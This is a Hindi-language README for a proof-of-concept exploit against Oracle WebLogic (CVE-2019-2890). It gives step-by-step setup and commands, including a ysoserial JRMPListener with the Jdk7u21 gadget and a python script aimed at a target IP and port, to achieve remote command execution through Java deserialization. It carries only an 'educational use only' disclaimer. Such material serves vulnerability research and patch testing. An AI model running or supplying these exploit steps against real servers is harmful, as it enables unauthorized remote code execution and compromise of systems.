
CVE-2019-2890 के लिए PoC एक्सप्लॉइट जो Oracle WebLogic को लक्षित करता है, ysoserial पेलोड के माध्यम से JRMP डिसेरिएलाइज़ेशन का उपयोग करके रिमोट कमांड निष्पादन प्राप्त करता है।
केवल शैक्षिक और संचार उपयोग के लिए; अन्य उपयोगों के परिणामों की जिम्मेदारी स्वयं वहन करें।
सभी संबंधित jar फ़ाइलें पहले ही प्रोजेक्ट में आयात की जा चुकी हैं, और शोषण विधि yso के JRMP का उपयोग करती है; सीखने और डिबगिंग के समय आप शोषण विधि को संशोधित कर सकते हैं।
पहले, weblogic के अंतर्गत SerializedSystemIni.dat फ़ाइल को security फ़ोल्डर में रखें।
फिर, yso का नाम बदलकर ysoserial.jar करें और इसे lib निर्देशिका में आयात करें।

इसके बाद, weblogic/wsee/jaxws/persistence/PersistentContext.java में getObject के IP पते और पोर्ट को संशोधित करें।
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
अंत में, दूरस्थ रूप से JRMP श्रवण के माध्यम से 7u21 कमांड निष्पादन का उपयोग करें।
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
उपयोग विधि: Poc.java चलाकर poc.ser सीरियलाइज़ेशन फ़ाइल उत्पन्न करें, फिर निम्न के माध्यम से:
python weblogic.py ip port poc.ser

